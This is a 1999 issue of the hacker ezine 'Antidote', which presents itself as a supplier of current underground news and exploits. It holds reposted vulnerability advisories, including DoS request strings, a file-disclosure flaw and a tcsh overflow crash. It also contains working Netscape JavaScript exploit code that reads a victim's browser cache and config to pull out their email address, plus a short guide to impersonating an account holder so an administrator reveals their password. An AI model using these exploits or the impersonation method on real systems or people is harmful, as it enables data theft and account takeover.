Volume 2 Issue 6 5/29/99 ** ** ***** * * ** * * *** ** *** ** ** *** ** * ** ** * ** ******** ** **** ******** * ** *** **** ******** *** *** ** * *** * ******** *** * ** **** **** * ** *** ********* * **** ** * *** * ** ** **** ** ** ** **** ** ** ** * *** * ** ** ** ** ** ** ** ** ** ** ** *** ********* ** ** ** ** ** ** ** ** ** ******** * ** ** ** ** ** ** ** ** ** ** ******* * ** ** ** ** ** ** ** ** ** ** ** ***** ** ** ** ** ** ** ** ****** ** **** * * **** ** * *** *** ** *** * ***** **** ** ******* * ** ** *** *** *** *** ***** * ** http://www.thepoison.org/antidote bof_ptr = (long *)buffer; for (i = 0; i < bufsize - 4; i += 4) *(bof_ptr++) = get_sp() - offs; printf("Creating termcap f1le\n"); printf ("b1tch is Fe3lin 1t.\n"; ------------------------------ In this issue of Antidote, we have over 580 subscribers and getting more everyday! The only thing that we ask of you when you read Antidote, is that you go to: www.thepoison.org/popup.html and click on our sponsors. One issue of Antidote takes us about a week to put together and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor because it is the only thing we ask of you. --=\\Contents\\=-- 0.00 - Beginning 0.01 - What? 0.02 - FAQ 0.03 - Shouts 0.04 - Writing 1.00 - News 1.01 - Cold Fusion Fixes 1.02 - Bombs on the Net 1.03 - Government Issues 2.00 - Exploits (new & older) 2.01 - counter_exe.dos.txt 2.02 - exlibris.alpeh.webserver.txt 2.03 - alibaba2_0.genkey.txt 2.04 - nt4_sp4.quota.dos.txt 2.05 - netscape.title_tag.txt 2.06 - tcsh.bof.txt 3.00 - Misc 3.01 - Social Engineering 3.02 - Newbie Ethnics 3.03 - FED Up ------------------------------ 0.01 --=\\What?\\=-- What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on there hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc, then you might want to go to your local bookstore and see if they carry '2600'. ------------------------------ 0.02 --=\\FAQ\\=-- Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question. > What exactly is "Antidote"? See section 0.01 for a complete description. > I find Antidote to not be shot for the beginner or does not teach you the basics, why is that? Antidote is for everyone, all we are basically is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are recieved second hand (sent to us) and we very rarely edit anyone's articles. > I just found Antidote issues on your webpage, is there anyway I can get them sent to me through e-mail? Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will recieve a link to the current Antidote (where you can view it). > If I want to submit something, are there any 'rules'? Please see section 0.03 for a complete description. > If I submitted something, can I remain anonymous? Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say. > I submitted something and I didn't see it in the current/last issue, why is that? It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues off Antidote. > Can I submit something that I didn't "discover" or "write"? Yes you can, we take information that is written by anyone regardless if you wrote it or not. Well thats it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month. ------------------------------ 0.03 --=\\Shouts\\=-- These are just some shout outs that we feel we owe to some people. Some are individuals and Some are groups in general. If you are not on this list and you feel that For some reason you should be, then please contact Lord Oak and he will post you on here and we are sorry for the Misunderstanding. Well, here are the shout outs: Lord Oak EazyMoney Duece Astral PBBSER oX1dation Forlorn Retribution 0dnek www.thepoison.org Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you. ------------------------------ 0.04 --=\\Writing\\=-- As many of you know, we are always open to articles/submittings. We will take almost anything that has to do with computer security. This leaves you open for: -Protecting the system (security/securing) -Attacking the system (hacking, exploits, flaws, etc....) -UNIX (really anything to do with it...) -News that has to do with any of the above.... The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we recieve two e-mails with the same topic/idea then we will use the one that we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be: If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday. And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it). ------------------------------ _________________________________ ) ___ ( ( //___/ / // ) ) // ) ) ) ) /____ / // / / __ / / ( ( / / // / / ) ) ) ) / / ((___/ / ((___/ / ( ( http://www.403-security.org ) ) For the latest hacks and news ( (___________________________________) 1.01 --=\\Cold Fusion Fixes\\=-- New Allaire Security Zone Bulletins and KB Articles Dear ColdFusion Customer- Several new security issues that may affect ColdFusion customers have come to our attention recently. Please visit the Security Zone at the Allaire Web site to learn about these new issues and what actions you can take to address them: http://www.allaire.com/security Recently we posted the following new and updated Allaire Security Bulletins and Knowledge Base Articles: UPDATED ASB99-02: ColdFusion Example Applications and Sample Code Exposes Servers ADDED ASB99-06: Netscape Servers for Win NT Exposure of Source Code with "%20" ASB99-07: Possible Denial-of-Service Attack Using CF Admin. Start/Stop Utility ASB99-08: Pages Encrypted with CFCRYPT.EXE Can Be Illegally Decrypted Article 10954: Security Best Practice: Securing the ColdFusion Administrator Article 10953: Security Best Practice: Securing File-based DBs (i.e. Access) Article 10955: Security Best Practice: URL Session Variables and HTTP_REFERRER As a Web application platform vendor, one of our highest concerns is the security of the systems our customers deploy. We understand how important security is to our customers, and we're committed to providing the technology and information customers need to build secure Web applications. Thank you for your time and consideration on this issue. -- Damon Cooper Security Response Team Coordinator, Allaire Corporation P.S. As a reminder, Allaire has set up an email address that customers can use to report security issues associated with an Allaire product: secure@allaire.com. ------------------------------ 1.02 --=\\Bombs on the Net\\=-- Well, as many people already know, bomb making webpages will be taken off of the internet. They have always tried to make "bomb making on the internet" illegal, but finally this Littleton incident happened and that made the final decision. This law can never be fully enforced due to the large ammounts of webpages there are. there is OVER 20,000,000 webpages (personal and bussiness) in wich around .8-9 million have something to do with anarchy or bomb related. Not nesacarly webpages dedicated to bomb making, but have maybe ONE recipe on how to make a bomb, but the webpage has other content on it. There are also ways around it. We all know the Anarchy Cookbook is sold in stores and they have the write to publish it because of "Freedom of Press" and speech. Well, technically you could buy that book and type EVERYTHING that is in that book and put it on the internet and it would be legal. The most important part is the Copyright. Obviously you would have to get permission from the Author to do this because of copy- right laws. If he approves it, then you could do it and it would be legal. This is a little off of the subject of bomb making, but it fits into the catagory "freedom of speech" and press. If you have noticed, both of those laws are starting to fade out little by little. First it was cigarettes. You are not allowed to have T.V., bilboard, and now they are trying to enforce magazine ads on cigarettes too. Now it is things with the internet. Next it will be violence and maybe even swearing because it "infulences" kids to have a bad mouth. To me, if they are going to take away these things, then they should take away some things like that also. If you think about, almost everytime a "law" like this is taken away, it is because of a current issue that happened in the U.S. So, basically they are taking away our civil rights becaues of things that we do for a punishment and not just because they feel like it (not necessarly a punishment, just forf safety etc...). Lord Oak lordoak@thepoison.org ------------------------------ 1.03 --=\\Government Issues\\=-- [www.msnbc.com] THE FBI and Senate Web sites remained inaccessible Friday as a result of the computer attacks. The FBI shut down its Web site Wednesday after it was swamped by a denial-of-service attack. The Senate took its site offline Thursday night after attack- ers broke into the public computer server and replaced the congressional body’s home page with a screed against the FBI. The hacked page claimed credit on behalf of a group known as the Masters of Downloading, or M0D and denigrated the FBI as well as Global Hell. The FBI may be all over the other groups like ... gH and tK. ... M0D make those morons look like a group of special-ed students! FBI vs. M0D in ’99, bring it on! read the page, which was peppered with ruder comments and hacker lingo. The intrusion compromised our Senate Internet Web site, and as a result the Senate has taken down our Web page to do some investigation, said Sherry Little, a spokeswoman for the Senate sergeant-at-arms, who manages the site. She said FBI agents were heading up the investigation. They’re looking at the criminal aspects of it, she told MSNBC. They’re in charge of the investigation, in that they’re trying to determine where it came from and whether there was any connection at all to any incidents that they’ve explored in the past. The Web outage rendered the official home pages of all 100 senators and senatorial commit- tees inaccessible, but e-mail and other computer services not related to the public Web site were unaffected, Little said. System administrators for the FBI and the Senate Web sites were beefing up site security during the down time and no one could say exactly when the sites would be returned to service. We’re not expecting this to be a long-term problem, Little said. The FBI was continuing its investigation into the attack on its own Web site, said Dave Miller, a media representative at the bureau’s national office. He confirmed that this could result in criminal penalties. Although he declined to provide specifics on the investigation, Miller told MSNBC that it would be a logical point that the FBI would look for connections to past attacks on federal Web sites. Earlier this month, Global Hell was implicated in attacks on a variety of U.S. government sites, including sites for the White House, several Cabinet departments and the U.S. Information Agency. Last week, Global Hell member Eric Burns (who also goes by the name Zyklon), was arrested in connection with three attacks on government computers. Members of Global Hell reported that law-enforcement officials served search warrants early Wednesday in Seattle, Houston and California. In Houston, FBI spokesman Rolando Moss told MSNBC that agents were investigating allegations of computer intrusions involving a teen-ager who uses the hacker handle Mosthated. He said the investigation was continuing and declined further comment. In telephone conversations with MSNBC, Mosthated said that his home was raided at about 6 a.m. CT Wednesday, and that family computer equipment was confiscated. He said his parents were really mad. ... The computer had all their financial information and stuff on it. Mosthated’s mother got on the line to read from the FBI’s receipt for the equipment and confirm that she was really mad. Mosthated said at least eight other people around the country had been served with search warrants as part of a huge hacker crackdown. Four other Houston-area hackers, three in California and one in Seattle reportedly received FBI visits. None was arrested, but all had computer equipment confiscated, he said. An FBI representative in San Diego said she could not comment on the investigation because the paperwork was sealed. Inquiries with the bureau’s Seattle office met with a similar response: Right now there are still things that need to be decided, one agent told MSNBC on condition of anonymity. http://www.msnbc.com/news/273819.asp#BODY ------------------------------ 10001010100101110101010101001011101010101000 0 1 1 Y88b Y88 888 888 888 88e e88'Y88 0 1 Y88b Y8 888 888 888 888b d888 'Y 1 0 b Y88b Y 8888888 888 8888D C8888 1 0 8b Y88b 888 888 888 888P Y888 ,d 1 1 88b Y88b 888 888 888 88" "88,d88 0 1 1 1 http://www.nudehackers.com 0 0 0 01001010110101010001011010010111010100101011 2.01 --=\\counter_exe.dos.txt\\=-- A denial of service exists in counter.exe version 2.70, a fairly popular webhit counter used on the Win32 platform with web servers such as IIS and WebSite Pro. There are two different bugs: 1) When someone requests : http://no-such-server-really/scripts/counter.exe?%0A this will create an entry in counter.log of a blank line then a ",1" . If the person then refreshes their browser and requests it again you get an Access Violation in counter.exe - the instruction at 0x00414c0a referenced memory at 0x00000000. 2) When someone requests: http://no-such-server-really/scripts/counter.exe?AAAAAover-2200-As you get a similar problem - though not a buffer overrun. Whilst in a state of "hanging" all other vaild requests for counter are queued and not dealt with until someone goes to the console and okays the AV messages. Added to this memory can be consumed if the page is continuosly requested. I mailed the author twice about this but as I have received no response I have nothing left to do but send this on. David Litchfield http://www.infowar.co.uk/mnemonix ------------------------------ 2.02 --=\\exlibris.alpeh.webserver.txt\\=-- We have found a security hole in web server bundled with Aleph librarian system ver. 3.25 and higher (ExLibris). The web server in its default configuration allows anybody to view any file in the system the aleph instalation owner can access. It it very simple to grab for example /etc/passwd file from Aleph web server. The bug with all details was already posted to ExLibris and to some groups of Aleph users. Workaround: 1) do not run web server as root at any circumstance! 2) use /etc/shadow or similar system 3) use tcpd wrappers for denying possible logins 4) watch logs from web server Please spread this message to Aleph admins! ------------------------------ 2.03 --=\\alibaba2_0.genkey.txt\\=-- Some time ago, I downloaded a trial version of an SSL web server product for Windows NT called 'Alibaba 2.0' for evaluation as a possible SSL solution. I eventually made a decision to use another product, but I ended up using an RSA key pair generated by Alibaba's 'genkey' utility (which is based on the popular SSLeay toolkit). Whilst recently examining the keys generated by 'genkey' using tools shipped as part of the SSLeay distribution, I discovered what I believe to be a serious flaw:- The 'genkey' utility erroneously generates a private key with an exponent of '1'. This results in null security since the RSA public key associated with a private exponent of '1' is also '1', with the effect that the session key for each SSL session to a server running 'Alibaba' is sent in the clear. The result of this vulnerability is that 'secure' web sites that use keys generated by the 'genkey' utility provided with Alibaba 2.0 do not provide any security. Such sites are susceptible to having their transactions snooped by a third party, or falsified by man-in-the-middle attacks. A further interesting discovery is that both Netscape Navigator and Internet Explorer will happily let the user interact with SSL web sites which have an RSA public key exponent of '1' without bringing the user's attention to the fact that such transactions are, in fact, entirely insecure. Chris Cowley, Grok Developments Ltd http://www.grok.co.uk/ [from RISKS-FORUM Digest 20.41] ------------------------------ 2.04 --=\\nt4_sp4.quota.dos.txt\\=-- File system full in %systemdrive% in Terminal Server can easily be reached by an ordinary user by growing his own profile so denying the logon to all roaming profiles users who don't have locally cached stored copy of their own profile. (Such result can also be reached by growing D:\temp dir, but you can prevent that modifing TEMP and TMP through system policies or modifing TEMP and TMP ntuser.dat hive HKCU\environment values.) Quota profile in SP4 are not effective to prevent growing of user profile, and so %systemdrive% can't be protected >from growing, and logon for roaming user can be denied by anyone. The profile quota in SP4 is supposed to give to administrators the ability to deny, through system policies, the ability to log off to any user who exceeds a specified quota until he/she make profile below the estabilshed quota. In fact article Q185561 says: << Remember that the user will not be able to log off if the user profile quota is exceeded. >> But the user can still log off exceeding the quota, if he kills his own process proquota.exe. *He* is the owner of the proquota.exe process, and not the system. It's very simple to do, unless the task manager is disabled through system policies too. I tried this in NT Terminal Server edition. The problem in Terminal Server may be seriuos because in case of a system full on %systemdrive% drive (wich stores the locally cached copies of actually logged users profiles) the logon will be denied to everyone who doesn't have locally cached copy of his own user profile (virtually all roaming profiles, if deleting locally stored cached copy of user profiles policy is applied). Nevertheless such kind of problems still remains if there will be simply changed the proquota.exe process security environment from user to system, because it comes up only in logoff. So I think Sp4 quota profiles through system policies is not so effective to solve profiles quota and security related problems in NT, and specially in NT Terminal Server Edition. Tonino Lucca ------------------------------ 2.05 --=\\netscape.title_tag.txt\\=-- There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they treat JavaScript code in the title of the document. One may embed JavaScript code in the TITLE tag. If the info about the document is shown, then the JavaScript code is executed. The info about the document may be infoked by a script using 'location="wysiwyg://1/about:document"'. The problem is that the JavaScript code is executed in the security context of the "about:" protocol. This allows accessing documents in the "about:" protocol such as: "about:cache", "about:config", "about:global", etc. Vulnerabilities: *Reading user's cache and accessing information such as passwords, credit card numbers. *Reading info about the Netscape's configuration ("about:config"). This includes finding user's email address, mail servers, the encoded mail password (it must me saved and may be decoded). This allows reading user's email. The more dangerous part is that this vulnerability MAY BE EXPLOITED USING HTML MAIL MESSAGE. Workaround: Disable JavaScript Code: <SCRIPT> a=window.open('wysiwyg://1/about:cache'); s='Here are some links in your cache: \n'; for(i=0;i<7;i++) s += a.document.links[i] + '\n'; a.close(); alert(s); a=window.open('wysiwyg://1/about:config'); mag='mail.identity.useremail = '; mend='general.title_tips'; res=mag; charstoread=20; alert('Will try to find your email. May take some time.'); function readit() { for(i=0;i<charstoread;i++) { t=res; a.find(mend); for(c=1;c<256;c++) { t=res + String.fromCharCode(c); if (a.find(t,true,true)) { /* alert(c); */ res=t; } } } res=res.substring(mag.length); a.close(); alert("Your email is :\n" + res); } setTimeout("readit()",3000); </SCRIPT> ------------------------------ 2.06 --=\\tcsh.bof.txt\\=-- While few days ago there was discussion about bash overflow on bugtraq i found another overflow in tcsh-6.07.09-1 [ rh 5.2 ]. The problem is in too long $HOME evironment variable [ very old thing - zgv overflow ]. I don't know if it's a dangerous problem, but like someone said this shell can be used in some kind of script with SUID, etc. example: $ HOME=AAAAAAAAAAAAAAA...AAA $ export HOME $ tcsh Segmentation fault (core dumped) $ gdb tcsh core GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (no debugging symbols found)... Core was generated by `-csh'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libnsl.so.1...done. Reading symbols from /lib/libtermcap.so.2...done. Reading symbols from /lib/libcrypt.so.1...done. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. Reading symbols from /lib/libnss_files.so.1...done. #0 0x410041 in ?? () (gdb) hmmm... that's all =) sorry, if it's not a new thing, but i haven't seen anything like this before on bugtraq... arkth [holix inc.] arkth@friko4.onet.pl ------------------------------ 3.01 --=\\Social Engineering\\=-- What is Social Engineering? Basically, social engineering is the art and science of getting people to do what you want them to do. It will not allow you to get people to perform tasks they whould never do.Social engineering can involve a lot of 'groundwork', information gathering and idle chit chat before an attempt at gaining information is ever made. Like hacking, most of the work is in the preparation, rather than the attempt itself. Methods: The First is the most obvious you just ask for what you want although this usually never works it still doesn't hurt to try :) The next method whould be getting all the info about what you want to do where they are located who they are email address etc.. here is an example. Ok say you want to get an account on a server well first you need to get all the info you can possible you need to find someone that has an account on the server and you want to get ALL the info on that person his email address real name where he lives the more info the better then you email the admin of that server requesting the username or passwd to your the person your trying to mimic it's as simple as that. oX1dation ------------------------------ 3.02 --=\\Newbie Ethnics\\=-- This is the first article I am writing and as such an occasion I decided to write about my favorite topic which is computer hacking. Now this is not to be confused with system cracking which of course is the act of mindlessly breaking into systems, spreading viruses, and doing things which hurt innocent people who just don't know anything about the world of sercurity. I guess being a native New Yorker I am born with the sence of susipicion and a want of sercurity. Well let me get to the point of this article. It is meant to show all those who call themselves hackers a thing of two. I will guess that only half the people who read this paper will actually amount to being a real hacker. Well without further delay here is a paper on what a hacker really is. eLLitE DoOdZ All you newbies who are entering the wonderful world of hacking, I bet you looked into hacking because you want to be one of those "ellite" hackers in the movies right. Let me tell you something right now you will most likely never be one of the James Bond evil geniuses who crack into sensitive military information. Now I don't say this to mean that you aren't intelligent enough,it is simply not possible. It is a rare occasion that someone actually can break into any system that has sensitive information and not be caught. I've heard of less than a half dozen times when this rare occasion occurs. Getting caught is all most inevitable. Even those who have years of experience in sercurity and programming would have a great task ahead of them for a mission like that. Now those so called "cool techno wiz kids" also have boasted about hacking peoples accounts at school right? Well heres a word to the wise, its probally not as good as it sounds. And even if they are I'll give you nine to five odds they used some lame program of the internet to complete it. If they were for real they wouldn't ever admitted they done it all over school. So my message is if you want to be some kind of "Super Hacker" rent a movie and make it "A blockbuster night" because your dreaming. Face it your a newbie and you have to learn the basics before you do anything to impress your freinds. If you can stand the wait you'll have the reap the rewards of hacking and how cool it can be. Progz In the last paragraph I just skimmed over programs. Now the reason I downplay programs is the simple fact unless you wrote the program its not hacking. Any idiot can run a program ( I hope!). If you start using programs that do everything for you than what are you learning. I once read somewhere on one of the hundreds of hacking sites I've visited that "Hacking is using your knowledge to gain more knowledge". Now I've spent hours thinking about that and I'll tell you right now that is the best definition I've ever heard. Now please do not misunderstand what I'm saying. There are select number of programs that are good to have on hand for automating certain tasks. Now if you wanted to find out about the open ports on a computer you have to options. You can run a port surfer or check by hand. Now I almost never use a port surfer because it can cause you problems with your isp as well as not give you all the critical information you need. If your pressed for time in a wargame with a freinds server or something well than go ahead and use that program. I'll be honest with you's I keep programs on hand. I have a unix password cracker, port surfer, and even a mailbomber (which I use with much discretion and if you have half a brain you will too). And even keep a disk with a few of those intresting programs that are nice to have. Be wary of programs they are a crutch which you will become permanently attached to if your not careful. Newbie tip section Now if you are a intermediate hacker or above you can skip this section. Read if you like though. This goes out in response to the constant stream of newbies out there who prowl the chat rooms and newsgroups looking for intelligent people and sucking every bit of patience out of them. I can not even count the amount of newbies who have contacted me with questions like "Please teach me to hack?"or the infamous "How do I hack?". If you have any pride or brains you will never say these words in a chat room, newsgroup, or any other medium of the sort. I can not begin to tell you how irritating it is to be asked dumb questions over and over and over again. Day after day, month after month. I know that being new to anything is hard but if you persist in doing things like that you will inevitablely learn the true meaning of a flame. But I know you're all wondering how do I find out how to hack then? You use a ****ing search engine! Look up things like "hacking" and "computer sercurity".If you want to chat with other hackers ask specific questions like "Anyone know some good URL's". I'll tell you right now for the time I've been into hacking I've foung the best hacking sites right from people in the chat rooms. Not to mention if you find a good site be sure to share with others. I'm sure it will be greatly appreciated. So what is real hacking anyway? Well I've told what hacking is not. Now lets talk about what it is. Hacking, as I said before, is using your knowledge to expand your knowledge. Now that means you should become familiar with the various operating systems on the internet which are UNIX and WINDOWS NT. Port surfing computers is another very honorable way of hacking. You wouldn't believe how many things can be learned by port surfing the various protocols you'll come across. Even if criminal hackers port surf to learn as much about a system as possible. This is because of the golden rule of breaking a sysytem. YOU CAN NOT BREAK INTO A SYSTEM THAT YOU DON"T UNDERSTAND. Now of course if you are guessing passwords you may get in. But what will you do once your inside. After you know how to use various systems the next step is programming which I recently started. Well thats enough for now. Remember what a hacker is at all times. Lastly look for the Guide to Mostly Harmless Hacking written by Carolyn Meinel. The Mob Boss (A.K.A. Mafia_man777) ------------------------------ 3.03 --=\\FED Up\\=-- As most of us have seen lately on the news is a bunch of "hackers" getting caught, well, it seems as though hackers are getting on the governments nerves. Well, they always have been, but now they are acctually arresting large ammounts of people. Maybe it is because there has been hacking in: senate.gov, whitehouse.gov, and fbi.gov (no real proof on that one, but there are rumors). If you went to HNN this week, you would have seen the fallowing issues about people getting caught: FBI Raids Suspect Crackers Five Busted in Florida Zyklon Busted IronLungs Raided Analyzer Cohorts to Testify Against Him And a while ago there was : S C R E A M Caught. I have never seen anything like this in such a short period of time, even a lot of members from gH got arrested and are in jail right now. The government is now out to get us more then they are Randolf (pretty much)(Randolf is the guy that did the Olympic bombings and has been on the most wanted list for about 2 years.). Think about it, they are looking for hackers and they are looking for Randolph, but they pretty much gave up on him and are just looking for hackers. Lord Oak lordoak@thepoison.org ------------------------------ Please go to: www.thepoison.org/popup.html and click on our sponsor because we have to pay the bills someway.... _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| _] _| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _| _| _| _| _| _| _| Antidote is an HNN Affiliate _| _| http://www.hackernews.com _| _| _| _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| All ASCII art is done by Lord Oak and permission is needed before using them. If you would like to use them, please contact him at: lordoak@thepoison.org